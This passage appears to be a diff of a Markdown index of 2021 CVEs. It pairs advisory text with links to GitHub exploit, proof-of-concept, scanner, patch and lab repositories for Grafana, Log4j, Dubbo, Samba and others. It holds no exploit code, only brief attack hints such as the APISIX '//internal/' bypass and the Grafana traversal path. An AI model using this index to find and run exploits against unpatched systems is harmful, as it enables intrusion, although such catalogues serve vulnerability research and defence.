+- [Wrin9/CVE-2021-43287](https://github.com/Wrin9/CVE-2021-43287) + +### CVE-2021-43297 (2022-01-10) + +A deserialization vulnerability existed in dubbo hessian-lite 3.2.11 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protocol, during Hessian catch unexpected exceptions, Hessian will log out some imformation for users, which may cause remote command execution. This issue affects Apache Dubbo Apache Dubbo 2.6.x versions prior to 2.6.12; Apache Dubbo 2.7.x versions prior to 2.7.15; Apache Dubbo 3.0.x versions prior to 3.0.5. + + +- [bitterzzZZ/CVE-2021-43297-POC](https://github.com/bitterzzZZ/CVE-2021-43297-POC) +- [longofo/Apache-Dubbo-Hessian2-CVE-2021-43297](https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297) + +### CVE-2021-43326 (2021-12-15) + +Automox Agent before 32 on Windows incorrectly sets permissions on a temporary directory. + + +- [gfoss/CVE-2021-43326_Exploit](https://github.com/gfoss/CVE-2021-43326_Exploit) + +### CVE-2021-43408 (2021-11-19) + +The "Duplicate Post" WordPress plugin up to and including version 1.1.9 is vulnerable to SQL Injection. SQL injection vulnerabilities occur when client supplied data is included within an SQL Query insecurely. SQL Injection can typically be exploited to read, modify and delete SQL table data. In many cases it also possible to exploit features of SQL server to execute system commands and/or access the local file system. This particular vulnerability can be exploited by any authenticated user who has been granted access to use the Duplicate Post plugin. By default, this is limited to Administrators, however the plugin presents the option to permit access to the Editor, Author, Contributor and Subscriber roles. + + +- [tuannq2299/CVE-2021-43408](https://github.com/tuannq2299/CVE-2021-43408) + +### CVE-2021-43469 (2021-12-06) + +VINGA WR-N300U 77.102.1.4853 is affected by a command execution vulnerability in the goahead component. + + +- [badboycxcc/CVE-2021-43469](https://github.com/badboycxcc/CVE-2021-43469) + +### CVE-2021-43471 (2021-12-06) + +In Canon LBP223 printers, the System Manager Mode login does not require an account password or PIN. An attacker can remotely shut down the device after entering the background, creating a denial of service vulnerability. + + +- [cxaqhq/CVE-2021-43471](https://github.com/cxaqhq/CVE-2021-43471) + +### CVE-2021-43503 +- [guoyanan1g/Laravel-vul](https://github.com/guoyanan1g/Laravel-vul) +- [kang8/CVE-2021-43503](https://github.com/kang8/CVE-2021-43503) + +### CVE-2021-43515 (2022-04-08) + +CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file. + + +- [ixSly/CVE-2021-43515](https://github.com/ixSly/CVE-2021-43515) + +### CVE-2021-43530 (2021-12-08) + +A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 94. + + +- [hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-](https://github.com/hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-) + +### CVE-2021-43557 (2021-11-22) + +The uri-block plugin in Apache APISIX before 2.10.2 uses $request_uri without verification. The $request_uri is the full original request URI without normalization. This makes it possible to construct a URI to bypass the block list on some occasions. For instance, when the block list contains "^/internal/", a URI like `//internal/` can be used to bypass it. Some other plugins also have the same issue. And it may affect the developer's custom plugin. + + +- [xvnpw/k8s-CVE-2021-43557-poc](https://github.com/xvnpw/k8s-CVE-2021-43557-poc) + +### CVE-2021-43609 (2023-11-08) + +An issue was discovered in Spiceworks Help Desk Server before 1.3.3. A Blind Boolean SQL injection vulnerability within the order_by_for_ticket function in app/models/reporting/database_query.rb allows an authenticated attacker to execute arbitrary SQL commands via the sort parameter. This can be leveraged to leak local files from the host system, leading to remote code execution (RCE) through deserialization of malicious data. + + +- [d5sec/CVE-2021-43609-POC](https://github.com/d5sec/CVE-2021-43609-POC) + +### CVE-2021-43616 (2021-11-13) + +The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI. + + +- [icatalina/CVE-2021-43616](https://github.com/icatalina/CVE-2021-43616) + +### CVE-2021-43617 (2021-11-14) + +Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on systems based on Debian. NOTE: this CVE Record is for Laravel Framework, and is unrelated to any reports concerning incorrectly written user applications for image upload. + + +- [kombat1/CVE-2021-43617](https://github.com/kombat1/CVE-2021-43617) +- [aweiiy/CVE-2021-43617](https://github.com/aweiiy/CVE-2021-43617) +- [Sybelle03/CVE-2021-43617](https://github.com/Sybelle03/CVE-2021-43617) + +### CVE-2021-43650 (2022-03-22) + +WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process. + + +- [OpenXP-Research/CVE-2021-43650](https://github.com/OpenXP-Research/CVE-2021-43650) + +### CVE-2021-43657 (2022-12-22) + +A Stored Cross-site scripting (XSS) vulnerability via MAster.php in Sourcecodetester Simple Client Management System (SCMS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the vulnerable input fields. + + +- [c0n5n3d/CVE-2021-43657](https://github.com/c0n5n3d/CVE-2021-43657) + +### CVE-2021-43778 (2021-11-24) + +Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file. + + +- [AK-blank/CVE-2021-43778](https://github.com/AK-blank/CVE-2021-43778) + +### CVE-2021-43789 (2021-12-07) + +PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2. + + +- [numanturle/CVE-2021-43789](https://github.com/numanturle/CVE-2021-43789) + +### CVE-2021-43798 (2021-12-07) + +Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline. + + +- [taythebot/CVE-2021-43798](https://github.com/taythebot/CVE-2021-43798) +- [zer0yu/CVE-2021-43798](https://github.com/zer0yu/CVE-2021-43798) +- [jas502n/Grafana-CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798) +- [ScorpionsMAX/CVE-2021-43798-Grafana-POC](https://github.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC) +- [Mr-xn/CVE-2021-43798](https://github.com/Mr-xn/CVE-2021-43798) +- [asaotomo/CVE-2021-43798-Grafana-Exp](https://github.com/asaotomo/CVE-2021-43798-Grafana-Exp) +- [A-D-Team/grafanaExp](https://github.com/A-D-Team/grafanaExp) +- [kenuosec/grafanaExp](https://github.com/kenuosec/grafanaExp) +- [M0ge/CVE-2021-43798-grafana_fileread](https://github.com/M0ge/CVE-2021-43798-grafana_fileread) +- [JiuBanSec/Grafana-CVE-2021-43798](https://github.com/JiuBanSec/Grafana-CVE-2021-43798) +- [lfz97/CVE-2021-43798-Grafana-File-Read](https://github.com/lfz97/CVE-2021-43798-Grafana-File-Read) +- [s1gh/CVE-2021-43798](https://github.com/s1gh/CVE-2021-43798) +- [z3n70/CVE-2021-43798](https://github.com/z3n70/CVE-2021-43798) +- [Mo0ns/Grafana_POC-CVE-2021-43798](https://github.com/Mo0ns/Grafana_POC-CVE-2021-43798) +- [fanygit/Grafana-CVE-2021-43798Exp](https://github.com/fanygit/Grafana-CVE-2021-43798Exp) +- [LongWayHomie/CVE-2021-43798](https://github.com/LongWayHomie/CVE-2021-43798) +- [pedrohavay/exploit-grafana-CVE-2021-43798](https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798) +- [gixxyboy/CVE-2021-43798](https://github.com/gixxyboy/CVE-2021-43798) +- [Ryze-T/CVE-2021-43798](https://github.com/Ryze-T/CVE-2021-43798) +- [k3rwin/CVE-2021-43798-Grafana](https://github.com/k3rwin/CVE-2021-43798-Grafana) +- [gps1949/CVE-2021-43798](https://github.com/gps1949/CVE-2021-43798) +- [halencarjunior/grafana-CVE-2021-43798](https://github.com/halencarjunior/grafana-CVE-2021-43798) +- [aymenbouferroum/CVE-2021-43798_exploit](https://github.com/aymenbouferroum/CVE-2021-43798_exploit) +- [Jroo1053/GrafanaDirInclusion](https://github.com/Jroo1053/GrafanaDirInclusion) +- [yasindce1998/grafana-cve-2021-43798](https://github.com/yasindce1998/grafana-cve-2021-43798) +- [hupe1980/CVE-2021-43798](https://github.com/hupe1980/CVE-2021-43798) +- [G01d3nW01f/CVE-2021-43798](https://github.com/G01d3nW01f/CVE-2021-43798) +- [mauricelambert/LabAutomationCVE-2021-43798](https://github.com/mauricelambert/LabAutomationCVE-2021-43798) +- [FAOG99/GrafanaDirectoryScanner](https://github.com/FAOG99/GrafanaDirectoryScanner) +- [victorhorowitz/grafana-exploit-CVE-2021-43798](https://github.com/victorhorowitz/grafana-exploit-CVE-2021-43798) +- [katseyres2/CVE-2021-43798](https://github.com/katseyres2/CVE-2021-43798) +- [Iris288/CVE-2021-43798](https://github.com/Iris288/CVE-2021-43798) +- [wagneralves/CVE-2021-43798](https://github.com/wagneralves/CVE-2021-43798) +- [K3ysTr0K3R/CVE-2021-43798-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT) +- [ticofookfook/CVE-2021-43798](https://github.com/ticofookfook/CVE-2021-43798) +- [topyagyuu/CVE-2021-43798](https://github.com/topyagyuu/CVE-2021-43798) +- [MalekAlthubiany/CVE-2021-43798](https://github.com/MalekAlthubiany/CVE-2021-43798) +- [Sic4rio/Grafana-Decryptor-for-CVE-2021-43798](https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798) +- [0xSAZZAD/Grafana-CVE-2021-43798](https://github.com/0xSAZZAD/Grafana-CVE-2021-43798) + +### CVE-2021-43799 (2022-01-25) + +Zulip is an open-source team collaboration tool. Zulip Server installs RabbitMQ for internal message passing. In versions of Zulip Server prior to 4.9, the initial installation (until first reboot, or restart of RabbitMQ) does not successfully limit the default ports which RabbitMQ opens; this includes port 25672, the RabbitMQ distribution port, which is used as a management port. RabbitMQ's default "cookie" which protects this port is generated using a weak PRNG, which limits the entropy of the password to at most 36 bits; in practicality, the seed for the randomizer is biased, resulting in approximately 20 bits of entropy. If other firewalls (at the OS or network level) do not protect port 25672, a remote attacker can brute-force the 20 bits of entropy in the "cookie" and leverage it for arbitrary execution of code as the rabbitmq user. They can also read all data which is sent through RabbitMQ, which includes all message traffic sent by users. Version 4.9 contains a patch for this vulnerability. As a workaround, ensure that firewalls prevent access to ports 5672 and 25672 from outside the Zulip server. + + +- [scopion/CVE-2021-43799](https://github.com/scopion/CVE-2021-43799) + +### CVE-2021-43811 (2021-12-08) + +Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24. + + +- [s-index/CVE-2021-43811](https://github.com/s-index/CVE-2021-43811) + +### CVE-2021-43821 (2021-12-14) + +Opencast is an Open Source Lecture Capture & Video Management for Education. Opencast before version 9.10 or 10.6 allows references to local file URLs in ingested media packages, allowing attackers to include local files from Opencast's host machines and making them available via the web interface. Before Opencast 9.10 and 10.6, Opencast would open and include local files during ingests. Attackers could exploit this to include most local files the process has read access to, extracting secrets from the host machine. An attacker would need to have the privileges required to add new media to exploit this. But these are often widely given. The issue has been fixed in Opencast 10.6 and 11.0. You can mitigate this issue by narrowing down the read access Opencast has to files on the file system using UNIX permissions or mandatory access control systems like SELinux. This cannot prevent access to files Opencast needs to read though and we highly recommend updating. + + +- [Jackey0/opencast-CVE-2021-43821-env](https://github.com/Jackey0/opencast-CVE-2021-43821-env) + +### CVE-2021-43848 (2022-02-01) + +h2o is an open source http server. In code prior to the `8c0eca3` commit h2o may attempt to access uninitialized memory. When receiving QUIC frames in certain order, HTTP/3 server-side implementation of h2o can be misguided to treat uninitialized memory as HTTP/3 frames that have been received. When h2o is used as a reverse proxy, an attacker can abuse this vulnerability to send internal state of h2o to backend servers controlled by the attacker or third party. Also, if there is an HTTP endpoint that reflects the traffic sent from the client, an attacker can use that reflector to obtain internal state of h2o. This internal state includes traffic of other connections in unencrypted form and TLS session tickets. This vulnerability exists in h2o server with HTTP/3 support, between commit 93af138 and d1f0f65. None of the released versions of h2o are affected by this vulnerability. There are no known workarounds. Users of unreleased versions of h2o using HTTP/3 are advised to upgrade immediately. + + +- [neex/hui2ochko](https://github.com/neex/hui2ochko) + +### CVE-2021-43857 (2021-12-27) + +Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8. + + +- [lowkey0808/CVE-2021-43857](https://github.com/lowkey0808/CVE-2021-43857) + +### CVE-2021-43858 (2021-12-27) + +MinIO is a Kubernetes native application for cloud storage. Prior to version `RELEASE.2021-12-27T07-23-18Z`, a malicious client can hand-craft an HTTP API call that allows for updating policy for a user and gaining higher privileges. The patch in version `RELEASE.2021-12-27T07-23-18Z` changes the accepted request body type and removes the ability to apply policy changes through this API. There is a workaround for this vulnerability: Changing passwords can be disabled by adding an explicit `Deny` rule to disable the API for users. + + +- [khuntor/CVE-2021-43858-MinIO](https://github.com/khuntor/CVE-2021-43858-MinIO) + +### CVE-2021-43883 (2021-12-15) + +Windows Installer Elevation of Privilege Vulnerability + + +- [jbaines-r7/shakeitoff](https://github.com/jbaines-r7/shakeitoff) + +### CVE-2021-43891 (2021-12-15) + +Visual Studio Code Remote Code Execution Vulnerability + + +- [parsiya/code-wsl-rce](https://github.com/parsiya/code-wsl-rce) + +### CVE-2021-43893 (2021-12-15) + +Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability + + +- [jbaines-r7/blankspace](https://github.com/jbaines-r7/blankspace) + +### CVE-2021-43908 (2021-12-15) + +Visual Studio Code Spoofing Vulnerability + + +- [Sudistark/vscode-rce-electrovolt](https://github.com/Sudistark/vscode-rce-electrovolt) + +### CVE-2021-43936 (2021-12-06) + +The software allows the attacker to upload or transfer files of dangerous types to the WebHMI portal, that may be automatically processed within the product's environment or lead to arbitrary code execution. + + +- [LongWayHomie/CVE-2021-43936](https://github.com/LongWayHomie/CVE-2021-43936) + +### CVE-2021-44026 (2021-11-19) + +Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search_params. + + +- [pentesttoolscom/roundcube-cve-2021-44026](https://github.com/pentesttoolscom/roundcube-cve-2021-44026) + +### CVE-2021-44077 (2021-11-29) + +Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration. + + +- [horizon3ai/CVE-2021-44077](https://github.com/horizon3ai/CVE-2021-44077) +- [pizza-power/Golang-CVE-2021-44077-POC](https://github.com/pizza-power/Golang-CVE-2021-44077-POC) + +### CVE-2021-44103 +- [paulotrindadec/CVE-2021-44103](https://github.com/paulotrindadec/CVE-2021-44103) + +### CVE-2021-44117 (2022-06-10) + +A Cross Site Request Forgery (CSRF) vulnerability exists in TheDayLightStudio Fuel CMS 1.5.0 via a POST call to /fuel/sitevariables/delete/4. + + +- [warmachine-57/CVE-2021-44117](https://github.com/warmachine-57/CVE-2021-44117) + +### CVE-2021-44132 (2022-02-25) + +A command injection vulnerability in the function formImportOMCIShell of C-DATA ONU4FERW V2.1.13_X139 allows attackers to execute arbitrary commands via a crafted file. + + +- [exploitwritter/CVE-2021-44132](https://github.com/exploitwritter/CVE-2021-44132) + +### CVE-2021-44142 (2022-02-21) + +The Samba vfs_fruit module uses extended file attributes (EA, xattr) to provide "...enhanced compatibility with Apple SMB clients and interoperability with a Netatalk 3 AFP fileserver." Samba versions prior to 4.13.17, 4.14.12 and 4.15.5 with vfs_fruit configured allow out-of-bounds heap read and write via specially crafted extended file attributes. A remote attacker with write access to extended file attributes can execute arbitrary code with the privileges of smbd, typically root. + + +- [hrsman/Samba-CVE-2021-44142](https://github.com/hrsman/Samba-CVE-2021-44142) +- [horizon3ai/CVE-2021-44142](https://github.com/horizon3ai/CVE-2021-44142) +- [gudyrmik/CVE-2021-44142](https://github.com/gudyrmik/CVE-2021-44142) + +### CVE-2021-44168 (2022-01-04) + +A download of code without integrity check vulnerability in the "execute restore src-vis" command of FortiOS before 7.0.3 may allow a local authenticated attacker to download arbitrary files on the device via specially crafted update packages. + + +- [0xhaggis/CVE-2021-44168](https://github.com/0xhaggis/CVE-2021-44168) + +### CVE-2021-44217 (2022-01-18) + +In Ericsson CodeChecker through 6.18.0, a Stored Cross-site scripting (XSS) vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API. + + +- [Hyperkopite/CVE-2021-44217](https://github.com/Hyperkopite/CVE-2021-44217) + +### CVE-2021-44228 (2021-12-10) + +Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. + + +- [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce) +- [Glease/Healer](https://github.com/Glease/Healer) +- [jacobtread/L4J-Vuln-Patch](https://github.com/jacobtread/L4J-Vuln-Patch) +- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228) +- [HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept) +- [boundaryx/cloudrasp-log4j2](https://github.com/boundaryx/cloudrasp-log4j2) +- [dbgee/CVE-2021-44228](https://github.com/dbgee/CVE-2021-44228) +- [CreeperHost/Log4jPatcher](https://github.com/CreeperHost/Log4jPatcher) +- [DragonSurvivalEU/RCE](https://github.com/DragonSurvivalEU/RCE) +- [simonis/Log4jPatch](https://github.com/simonis/Log4jPatch) +- [zlepper/CVE-2021-44228-Test-Server](https://github.com/zlepper/CVE-2021-44228-Test-Server) +- [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) +- [NorthwaveSecurity/log4jcheck](https://github.com/NorthwaveSecurity/log4jcheck) +- [nkoneko/VictimApp](https://github.com/nkoneko/VictimApp) +- [lhotari/pulsar-docker-images-patch-CVE-2021-44228](https://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228) +- [1in9e/Apache-Log4j2-RCE](https://github.com/1in9e/Apache-Log4j2-RCE) +- [KosmX/CVE-2021-44228-example](https://github.com/KosmX/CVE-2021-44228-example) +- [greymd/CVE-2021-44228](https://github.com/greymd/CVE-2021-44228) +- [mubix/CVE-2021-44228-Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes) +- [OopsieWoopsie/mc-log4j-patcher](https://github.com/OopsieWoopsie/mc-log4j-patcher) +- [wheez-y/CVE-2021-44228-kusto](https://github.com/wheez-y/CVE-2021-44228-kusto) +- [izzyacademy/log4shell-mitigation](https://github.com/izzyacademy/log4shell-mitigation) +- [Kadantte/CVE-2021-44228-poc](https://github.com/Kadantte/CVE-2021-44228-poc) +- [takito1812/log4j-detect](https://github.com/takito1812/log4j-detect) +- [winnpixie/log4noshell](https://github.com/winnpixie/log4noshell) +- [Azeemering/CVE-2021-44228-DFIR-Notes](https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes) +- [Puliczek/CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words) +- [kozmer/log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc) +- [alexandreroman/cve-2021-44228-workaround-buildpack](https://github.com/alexandreroman/cve-2021-44228-workaround-buildpack) +- [Adikso/minecraft-log4j-honeypot](https://github.com/Adikso/minecraft-log4j-honeypot) +- [racoon-rac/CVE-2021-44228](https://github.com/racoon-rac/CVE-2021-44228) +- [TheArqsz/CVE-2021-44228-PoC](https://github.com/TheArqsz/CVE-2021-44228-PoC) +- [1lann/log4shelldetect](https://github.com/1lann/log4shelldetect) +- [binganao/Log4j2-RCE](https://github.com/binganao/Log4j2-RCE) +- [phoswald/sample-ldap-exploit](https://github.com/phoswald/sample-ldap-exploit) +- [rakutentech/jndi-ldap-test-server](https://github.com/rakutentech/jndi-ldap-test-server) +- [uint0/cve-2021-44228--spring-hibernate](https://github.com/uint0/cve-2021-44228--spring-hibernate) +- [saharNooby/log4j-vulnerability-patcher-agent](https://github.com/saharNooby/log4j-vulnerability-patcher-agent) +- [f0ng/log4j2burpscanner](https://github.com/f0ng/log4j2burpscanner) +- [M1ngGod/CVE-2021-44228-Log4j-lookup-Rce](https://github.com/M1ngGod/CVE-2021-44228-Log4j-lookup-Rce) +- [byteboycn/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/byteboycn/CVE-2021-44228-Apache-Log4j-Rce) +- [lhotari/log4shell-mitigation-tester](https://github.com/lhotari/log4shell-mitigation-tester) +- [toramanemre/log4j-rce-detect-waf-bypass](https://github.com/toramanemre/log4j-rce-detect-waf-bypass) +- [logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner) +- [vorburger/Log4j_CVE-2021-44228](https://github.com/vorburger/Log4j_CVE-2021-44228) +- [gauthamg/log4j2021_vul_test](https://github.com/gauthamg/log4j2021_vul_test) +- [b-abderrahmane/CVE-2021-44228-playground](https://github.com/b-abderrahmane/CVE-2021-44228-playground) +- [leetxyz/CVE-2021-44228-Advisories](https://github.com/leetxyz/CVE-2021-44228-Advisories) +- [cado-security/log4shell](https://github.com/cado-security/log4shell) +- [WYSIIWYG/Log4J_0day_RCE](https://github.com/WYSIIWYG/Log4J_0day_RCE) +- [mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform](https://github.com/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform) +- [Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs](https://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs) +- [zzzz0317/log4j2-vulnerable-spring-app](https://github.com/zzzz0317/log4j2-vulnerable-spring-app) +- [datadavev/test-44228](https://github.com/datadavev/test-44228) +- [LemonCraftRu/JndiRemover](https://github.com/LemonCraftRu/JndiRemover) +- [zhangxvx/Log4j-Rec-CVE-2021-44228](https://github.com/zhangxvx/Log4j-Rec-CVE-2021-44228) +- [darkarnium/Log4j-CVE-Detect](https://github.com/darkarnium/Log4j-CVE-Detect) +- [chilliwebs/CVE-2021-44228_Example](https://github.com/chilliwebs/CVE-2021-44228_Example) +- [irgoncalves/f5-waf-enforce-sig-CVE-2021-44228](https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228) +- [jeffbryner/log4j-docker-vaccine](https://github.com/jeffbryner/log4j-docker-vaccine) +- [mergebase/log4j-detector](https://github.com/mergebase/log4j-detector) +- [unlimitedsola/log4j2-rce-poc](https://github.com/unlimitedsola/log4j2-rce-poc) +- [Jeromeyoung/log4j2burpscanner](https://github.com/Jeromeyoung/log4j2burpscanner) +- [corretto/hotpatch-for-apache-log4j2](https://github.com/corretto/hotpatch-for-apache-log4j2) +- [alexandre-lavoie/python-log4rce](https://github.com/alexandre-lavoie/python-log4rce) +- [RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs](https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs) +- [mzlogin/CVE-2021-44228-Demo](https://github.com/mzlogin/CVE-2021-44228-Demo) +- [blake-fm/vcenter-log4j](https://github.com/blake-fm/vcenter-log4j) +- [creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review](https://github.com/creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review) +- [uint0/cve-2021-44228-helpers](https://github.com/uint0/cve-2021-44228-helpers) +- [RK800-DEV/apache-log4j-poc](https://github.com/RK800-DEV/apache-log4j-poc) +- [sud0x00/log4j-CVE-2021-44228](https://github.com/sud0x00/log4j-CVE-2021-44228) +- [DiCanio/CVE-2021-44228-docker-example](https://github.com/DiCanio/CVE-2021-44228-docker-example) +- [myyxl/cve-2021-44228-minecraft-poc](https://github.com/myyxl/cve-2021-44228-minecraft-poc) +- [RrUZi/Awesome-CVE-2021-44228](https://github.com/RrUZi/Awesome-CVE-2021-44228) +- [future-client/CVE-2021-44228](https://github.com/future-client/CVE-2021-44228) +- [CodeShield-Security/Log4JShell-Bytecode-Detector](https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector) +- [Crane-Mocker/log4j-poc](https://github.com/Crane-Mocker/log4j-poc) +- [dtact/divd-2021-00038--log4j-scanner](https://github.com/dtact/divd-2021-00038--log4j-scanner) +- [kali-dass/CVE-2021-44228-log4Shell](https://github.com/kali-dass/CVE-2021-44228-log4Shell) +- [pravin-pp/log4j2-CVE-2021-44228](https://github.com/pravin-pp/log4j2-CVE-2021-44228) +- [Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228](https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228) +- [urholaukkarinen/docker-log4shell](https://github.com/urholaukkarinen/docker-log4shell) +- [ssl/scan4log4j](https://github.com/ssl/scan4log4j) +- [infiniroot/nginx-mitigate-log4shell](https://github.com/infiniroot/nginx-mitigate-log4shell) +- [lohanichaten/log4j-cve-2021-44228](https://github.com/lohanichaten/log4j-cve-2021-44228) +- [authomize/log4j-log4shell-affected](https://github.com/authomize/log4j-log4shell-affected) +- [guardicode/CVE-2021-44228_IoCs](https://github.com/guardicode/CVE-2021-44228_IoCs) +- [fireflyingup/log4j-poc](https://github.com/fireflyingup/log4j-poc) +- [qingtengyun/cve-2021-44228-qingteng-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-patch) +- [nccgroup/log4j-jndi-be-gone](https://github.com/nccgroup/log4j-jndi-be-gone) +- [qingtengyun/cve-2021-44228-qingteng-online-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch) +- [tasooshi/horrors-log4shell](https://github.com/tasooshi/horrors-log4shell) +- [Hydragyrum/evil-rmi-server](https://github.com/Hydragyrum/evil-rmi-server) +- [twseptian/spring-boot-log4j-cve-2021-44228-docker-lab](https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab) +- [OlafHaalstra/log4jcheck](https://github.com/OlafHaalstra/log4jcheck) +- [Panyaprach/Prove-CVE-2021-44228](https://github.com/Panyaprach/Prove-CVE-2021-44228) +- [momos1337/Log4j-RCE](https://github.com/momos1337/Log4j-RCE) +- [palominoinc/cve-2021-44228-log4j-mitigation](https://github.com/palominoinc/cve-2021-44228-log4j-mitigation) +- [cyberxml/log4j-poc](https://github.com/cyberxml/log4j-poc) +- [corneacristian/Log4J-CVE-2021-44228-RCE](https://github.com/corneacristian/Log4J-CVE-2021-44228-RCE) +- [Diverto/nse-log4shell](https://github.com/Diverto/nse-log4shell) +- [dotPY-hax/log4py](https://github.com/dotPY-hax/log4py) +- [sunnyvale-it/CVE-2021-44228-PoC](https://github.com/sunnyvale-it/CVE-2021-44228-PoC) +- [maxant/log4j2-CVE-2021-44228](https://github.com/maxant/log4j2-CVE-2021-44228) +- [atnetws/fail2ban-log4j](https://github.com/atnetws/fail2ban-log4j) +- [kimobu/cve-2021-44228](https://github.com/kimobu/cve-2021-44228) +- [ph0lk3r/anti-jndi](https://github.com/ph0lk3r/anti-jndi) +- [bigsizeme/Log4j-check](https://github.com/bigsizeme/Log4j-check) +- [pedrohavay/exploit-CVE-2021-44228](https://github.com/pedrohavay/exploit-CVE-2021-44228) +- [0xRyan/log4j-nullroute](https://github.com/0xRyan/log4j-nullroute) +- [fireeye/CVE-2021-44228](https://github.com/fireeye/CVE-2021-44228) +- [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) +- [rubo77/log4j_checker_beta](https://github.com/rubo77/log4j_checker_beta) +- [thecyberneh/Log4j-RCE-Exploiter](https://github.com/thecyberneh/Log4j-RCE-Exploiter) +- [halibobor/log4j2](https://github.com/halibobor/log4j2) +- [sourcegraph/log4j-cve-code-search-resources](https://github.com/sourcegraph/log4j-cve-code-search-resources) +- [thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832](https://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832) +- [helsecert/CVE-2021-44228](https://github.com/helsecert/CVE-2021-44228) +- [markuman/aws-log4j-mitigations](https://github.com/markuman/aws-log4j-mitigations) +- 